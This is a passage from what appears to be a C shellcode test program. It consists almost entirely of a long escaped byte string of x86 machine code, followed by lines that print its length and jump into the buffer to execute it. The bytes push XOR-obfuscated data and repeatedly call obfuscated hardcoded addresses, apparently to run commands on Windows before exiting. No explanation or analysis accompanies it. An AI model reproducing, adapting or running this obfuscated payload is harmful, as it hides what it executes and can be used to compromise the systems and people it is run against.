\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }